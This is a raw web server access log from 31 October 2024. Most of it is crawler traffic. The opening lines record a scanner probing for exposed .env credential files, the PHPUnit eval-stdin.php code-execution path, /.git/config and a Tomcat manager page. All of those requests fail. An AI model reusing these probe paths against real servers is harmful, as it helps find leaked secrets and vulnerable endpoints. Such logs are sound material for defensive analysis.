40.67.138.47 - - [31/Oct/2024:04:56:59 +0100] "GET /local/.env HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
40.67.138.47 - - [31/Oct/2024:04:57:00 +0100] "GET /api/.env HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
40.67.138.47 - - [31/Oct/2024:04:57:00 +0100] "GET /blog/.env HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
40.67.138.47 - - [31/Oct/2024:04:57:00 +0100] "GET /crm/.env HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
40.67.138.47 - - [31/Oct/2024:04:57:00 +0100] "GET /admin/.env HTTP/1.1" 404 284 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
40.67.138.47 - - [31/Oct/2024:04:57:01 +0100] "GET /laravel/.env HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
40.67.138.47 - - [31/Oct/2024:04:57:01 +0100] "GET /app/.env HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
40.67.138.47 - - [31/Oct/2024:04:57:01 +0100] "GET /app/config/.env HTTP/1.1" 404 288 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
40.67.138.47 - - [31/Oct/2024:04:57:01 +0100] "GET /apps/.env HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
40.67.138.47 - - [31/Oct/2024:04:57:02 +0100] "GET /audio/.env HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
40.67.138.47 - - [31/Oct/2024:04:57:02 +0100] "GET /cgi-bin/.env HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
40.67.138.47 - - [31/Oct/2024:04:57:02 +0100] "GET /backend/.env HTTP/1.1" 404 286 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
40.67.138.47 - - [31/Oct/2024:04:57:02 +0100] "GET /src/.env HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
40.67.138.47 - - [31/Oct/2024:04:57:03 +0100] "GET /base/.env HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
40.67.138.47 - - [31/Oct/2024:04:57:03 +0100] "GET /core/.env HTTP/1.1" 404 283 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
40.67.138.47 - - [31/Oct/2024:04:57:03 +0100] "GET /vendor/laravel/.env HTTP/1.1" 404 289 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
40.67.138.47 - - [31/Oct/2024:04:57:03 +0100] "GET /storage/.env HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
40.67.138.47 - - [31/Oct/2024:04:57:04 +0100] "GET /protected/.env HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
40.67.138.47 - - [31/Oct/2024:04:57:04 +0100] "GET /newsite/.env HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
40.67.138.47 - - [31/Oct/2024:04:57:04 +0100] "GET /www/.env HTTP/1.1" 404 282 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
40.67.138.47 - - [31/Oct/2024:04:57:04 +0100] "GET /sites/all/libraries/mailchimp/.env HTTP/1.1" 404 300 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
40.67.138.47 - - [31/Oct/2024:04:57:04 +0100] "GET /database/.env HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
40.67.138.47 - - [31/Oct/2024:04:57:05 +0100] "GET /public/.env HTTP/1.1" 404 285 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
40.67.138.47 - - [31/Oct/2024:04:57:05 +0100] "GET /coffeenostra.castlegem.co.uk/.env HTTP/1.1" 404 301 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
40.67.138.47 - - [31/Oct/2024:04:57:05 +0100] "POST / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
40.67.138.47 - - [31/Oct/2024:04:57:06 +0100] "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 306 "-" "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.183 Safari/537.36"
109.194.248.203 - - [31/Oct/2024:04:58:45 +0100] "GET / HTTP/1.0" 200 423 "-" "Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/75.0.3770.100 Safari/537.36"
156.59.198.135 - - [31/Oct/2024:04:59:58 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11245568.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:05:00:18 +0100] "GET /renault.2web.at/htdocs/export/xml/data/articles/202009141003_RenArticle.xml HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
136.243.145.46 - - [31/Oct/2024:05:01:59 +0100] "GET /robots.txt HTTP/1.1" 404 298 "-" "serpstatbot/2.1 (advanced backlink tracking bot; https://serpstatbot.com/; abuse@serpstatbot.com)"
136.243.145.46 - - [31/Oct/2024:05:01:59 +0100] "GET / HTTP/1.1" 200 274 "-" "serpstatbot/2.1 (advanced backlink tracking bot; https://serpstatbot.com/; abuse@serpstatbot.com)"
93.174.93.12 - - [31/Oct/2024:05:03:21 +0100] "\x16\x03\x02\x01o\x01" 400 383 "-" "-"
156.59.198.136 - - [31/Oct/2024:05:07:43 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11013245.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:05:08:05 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20160406105614.txt HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
60.191.125.35 - - [31/Oct/2024:05:08:28 +0100] "HEAD http://112.124.42.80:63435/ HTTP/1.1" 200 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36"
156.59.198.135 - - [31/Oct/2024:05:15:37 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12094916.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:05:15:59 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20170228092302.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:05:16:19 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11580782.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:05:16:41 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11951587.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:05:17:02 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20211129103814.txt HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:05:17:23 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10672714.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:05:17:44 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20190325100442.txt HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:05:18:05 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20161025142918.txt HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:05:18:26 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11184914.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:05:18:47 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11271424.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:05:19:08 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11133313.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:05:19:29 +0100] "GET /renault.2web.at/htdocs/export/xml/data/articles/202111171303_RenArticle.xml HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:05:19:51 +0100] "GET /renault.2web.at/htdocs/export/xml/data/articles/201909301003_RenArticle.xml HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:05:20:12 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/sammler_367850.pdf HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:05:20:33 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10458431.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:05:20:54 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11851343.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:05:21:15 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11201443.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
87.120.115.119 - - [31/Oct/2024:05:24:03 +0100] "GET /.git/config HTTP/1.1" 404 285 "-" "Mozilla/5.0 (X11; Linux i686; rv:49.0) Gecko/20100101 Firefox/49.0"
156.59.198.136 - - [31/Oct/2024:05:48:50 +0100] "GET /renault.2web.at/htdocs/export/xml/data/articles/202003031303_RenArticle.xml HTTP/1.0" 404 326 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:05:49:11 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11723554.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:05:49:32 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10892337.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:05:49:53 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11331610.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:05:55:45 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10371234.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:05:56:06 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10403555.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:05:56:27 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11581894.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:05:56:48 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11789666.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:05:57:09 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12490911.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:05:57:30 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10883759.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:05:57:52 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20151117150813.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:05:58:13 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20171205151413.txt HTTP/1.0" 404 324 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:05:58:34 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11126960.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:05:58:55 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10998645.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
185.242.226.10 - - [31/Oct/2024:05:58:56 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36"
156.59.198.136 - - [31/Oct/2024:06:03:22 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12323331.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
4.156.21.193 - - [31/Oct/2024:06:03:38 +0100] "GET /manager/html HTTP/1.1" 404 283 "-" "Mozilla/5.0 zgrab/0.x"
156.59.198.136 - - [31/Oct/2024:06:03:56 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12414373.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:06:04:17 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10252866.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:06:04:38 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/config/xml-toolbar/toolbar-desktop.xml HTTP/1.0" 404 329 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:06:05:00 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20180727093050.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:06:05:21 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11177601.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:06:08:50 +0100] "GET /renault.activities.at/htdocs/pinEdit/editor/help/userhelp-Dateien/image020.jpg HTTP/1.0" 404 328 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
109.194.248.203 - - [31/Oct/2024:06:10:29 +0100] "GET / HTTP/1.0" 200 423 "http://food-and-drink.vienna-lodgings.at/" "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36"
156.59.198.135 - - [31/Oct/2024:06:10:59 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11667116.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
95.214.55.43 - - [31/Oct/2024:06:12:15 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
45.156.128.43 - - [31/Oct/2024:06:12:34 +0100] "GET / HTTP/1.1" 200 274 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"
156.59.198.136 - - [31/Oct/2024:06:18:35 +0100] "GET /renault.2web.at/htdocs/export/xml/data/articles/202101120903_RenArticle.xml HTTP/1.0" 404 327 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:06:18:56 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11907234.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:06:19:17 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11824074.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:06:19:38 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20170504102623.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:06:19:59 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11359165.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:06:20:21 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10754191.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:06:20:42 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11907381.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:06:21:03 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11995254.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:06:21:24 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10433577.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:06:21:45 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11228932.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:06:22:07 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11423063.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:06:22:28 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10949071.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:06:22:49 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11444409.pdf HTTP/1.0" 404 321 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:06:23:10 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11984958.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:06:23:31 +0100] "GET /renault.2web.at/htdocs/export/txt/factura/FacturaExport20190724082846.txt HTTP/1.0" 404 325 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.136 - - [31/Oct/2024:06:23:52 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/11379325.pdf HTTP/1.0" 404 323 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:06:24:13 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/12043834.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
156.59.198.135 - - [31/Oct/2024:06:24:35 +0100] "GET /renault.activities.at/htdocs/export/pdf/emuc_document/10309968.pdf HTTP/1.0" 404 322 "-" "Mozilla/5.0 (Linux; Android 5.0) AppleWebKit/537.36 (KHTML, like Gecko) Mobile Safari/537.36 (compatible; Bytespider; spider-feedback@bytedance.com)"
